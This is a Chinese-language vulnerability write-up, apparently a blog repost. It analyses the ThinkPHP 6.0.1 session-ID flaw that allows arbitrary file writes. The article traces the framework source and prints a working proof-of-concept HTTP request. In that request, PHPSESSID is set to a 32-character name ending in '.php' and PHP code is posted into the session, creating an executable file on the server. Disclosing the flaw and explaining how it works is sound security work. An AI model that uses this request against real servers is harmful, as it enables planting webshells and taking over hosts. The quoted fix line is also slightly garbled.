专栏首页黑白安全ThinkPHP 6.0.1 漏洞分析(任意文件操作)

ThinkPHP 6.0.1 漏洞分析(任意文件操作)

原文作者:Zeo  本文已通过作者授权,未经授权禁止转载.

0x00:漏洞描述

2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞.该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell.

0x01:影响范围

  ThinkPHP6.0.0-6.0.1

0x02:环境准备

1、/tp60/app/middleware.php 文件开启session

2、去掉se注释session的

<?php
// 全局中间件定义文件
return [
    // 全局请求缓存
    // \think\middleware\CheckRequestCache::class,
    // 多语言加载
    // \think\middleware\LoadLangPack::class,
    // Session初始化
    \think\middleware\SessionInit::class
];

3、tp5/public/index.php在控制器中加入测试session的代码

public function test1(){
        $sid =$_POST['key'];
        session('zeo',$sid);
        return 666;
    }

意思是获取一个key设置写入session中

注:使用thinkphp6最好使用高版本的php

0x03:漏洞分析

    首先这个洞,理解是sessionid为进行校验,可以导致传入任意字符,例如xxx.php.而且一般来说sessionid会作为文件名创建对应的文件保存.这是第一步我们的已经实现文件可控,如果session文件再往里面写东西要是可控的话,这样不就可以getshell了,所以我构造了上面的控制器.

漏洞首先出现的地方是 sessionid可控

tp6/vendor/topthink/framework/src/think/session/Store.php

121行

/**
     * session_id设置
     * @access public
     * @param string $id session_id
     * @return void
     */
    public function setId($id = null): void
{
        $this->id = is_string($id) && strlen($id) === 32 ? $id : md5(microtime(true) . session_create_id());
    }

sessionid的设置的时候 为进行校验,只要是32位的就可以

同一个文件看一下session保存

tp6/vendor/topthink/framework/src/think/session/Store.php

254行

/**
     * 保存session数据
     * @access public
     * @return void
     */
    public function save(): void
{
        $this->clearFlashData();
        $sessionId = $this->getId();
        if (!empty($this->data)) {
            $data = $this->serialize($this->data);
            $this->handler->write($sessionId, $data);
        } else {
            $this->handler->delete($sessionId);
        }
        $this->init = false;
    }

先获取session id 然后是 $this->handler->write($sessionId, $data);; 在跟进一下handler 只有一个构造函数的初始化 变成一个 SessionHandlerInterface $handler

public function __construct($name, SessionHandlerInterface $handler, array $serialize = null)
{
        $this->name    = $name;
        $this->handler = $handler;
        if (!empty($serialize)) {
            $this->serialize = $serialize;
        }
        $this->setId();
    }
tp6/vendor/topthink/framework/src/think/middleware/SessionInit.php

这里获取到 PHPSESSID 的值 session id传入

if ($varSessionId && $request->request($varSessionId)) {
            $sessionId = $request->request($varSessionId);
        } else {
            $sessionId = $request->cookie($cookieName);
        }
        if ($sessionId) {
            $this->session->setId($sessionId);
$request->cookie($cookieName);这个里面看一下
protected $name = 'PHPSESSID'; 发现是这个参数
所以这个值就从PHPSESSID传就好了

然后传入Store 中 setId()函数判断,值检查了32位 就是第一个说的地方

最后保存session数据 在代码

tp6/vendor/topthink/framework/src/think/session/Store.php

跟进这个write方法

$this->handler->write($sessionId, $data);
这里的 handler 是继承的think\session\driver\file.php

跟进这个write方法

tp6/vendor/topthink/framework/src/think/session/driver/File.php
public function write(string $sessID, string $sessData): bool
{
        $filename = $this->getFileName($sessID, true);
        $data     = $sessData;
        if ($this->config['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }
        return $this->writeFile($filename, $data);
    }

这里有文件名的处理

getFileName($sessID, true);
protected function getFileName(string $name, bool $auto = false): string
{
        if ($this->config['prefix']) {
            // 使用子目录
            $name = $this->config['prefix'] . DIRECTORY_SEPARATOR . 'sess_' . $name;
        } else {
            $name = 'sess_' . $name;
        }
        $filename = $this->config['path'] . $name;
        $dir      = dirname($filename);
        if ($auto && !is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }
        return $filename;
    }

文件名只进行了路径拼接和加前缀

数据压缩没啥用 跟进 

$this->writeFile($filename, $data);
protected function writeFile($path, $content): bool
{
        return (bool) file_put_contents($path, $content, LOCK_EX);
    }

    直接写入了.这样就出现问题了.

    文件名可控,XXX.php里面的内容是序列化之后的,但是可控制话也说直接getshell.

0x04:脚本利用

根据控制器构造数据包

注意 session PHPSESSID= 后面要按照要求必须32位可以随便构造!!!

POST /tp6/public/index.php/index/test1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/tp6/public/index.php/index/test1
Cookie: PHPSESSID=1234567890123456789012345678.php; 
Upgrade-Insecure-Requests: 1
key=<?php%20phpinfo();?>

        然后就是找到这个文件,一般位于项目根目录下的./runtime/session/文件夹下,加上之前前缀的拼接,那就是

/runtime/session/sess_1234567890123456789012345678.php

然后成功

0x05:修复方案

    官方也给出方案:对session id 加一个过滤使用ctype_alnum()

$this->id = is_string($id) && strlen($id) === 32 ctype_alnum($id) && ? $id : md5(microtime(true) . session_create_id());

文由洛米唯熊

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Thinkphp < 6.0.2 session id未作过滤导致getshell

    2020年1月13号,Thinkphp 6.0.2发布,在详情页指出修复了一处Session安全隐患。

    周俊辉
  • Thinkphp < 6.0.2 session id未作过滤导致getshell

    2020年1月13号,Thinkphp 6.0.2发布,在详情页指出修复了一处Session安全隐患。

    周俊辉
  • 来做个Google Hack吗?

    storemanager/contents/item.php?page_code=

    周俊辉
  • ThinkPHP 6.0.1 漏洞分析(任意文件操作)

    2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞.该漏洞允许攻击者在目标环境启用ses...

    洛米唯熊
  • Django 2.1.7 Session基本操作,解决 'WSGIRequest' object has no attribute 'session' 问题

    上一篇Django 2.1.7 状态保持 - Cookie介绍了Django中关于cookie的基本使用,本篇章继续来看看session的操作。

    Devops海洋的渔夫
  • Thinkphp < 6.0.2 session id未作过滤导致getshell

    2020年1月13号,Thinkphp 6.0.2发布,在详情页指出修复了一处Session安全隐患。

    周俊辉
  • Thinkphp < 6.0.2 session id未作过滤导致getshell

    2020年1月13号,Thinkphp 6.0.2发布,在详情页指出修复了一处Session安全隐患。

    周俊辉
  • nodejs的session管理

    在WEB开发中,服务器可以为每个用户浏览器创建一个会话对象(session对象),注意:一个浏览器独占一个session对象(默认情况下)。因此,在需要保存用户...

    无邪Z
  • servlet三大作用域:request,session,application

    javaweb开发中Servlet三大域对象的应用(request、session、application(ServletContext))。 1. requ...

    ydymz
  • Vue与React的异同—生命周期(一)

    版权声明:本文为吴孔云博客原创文章,转载请注明出处并带上链接,谢谢。 https://blog.csdn.net/wkyseo/articl...

    空空云

扫码关注云+社区

领取腾讯云代金券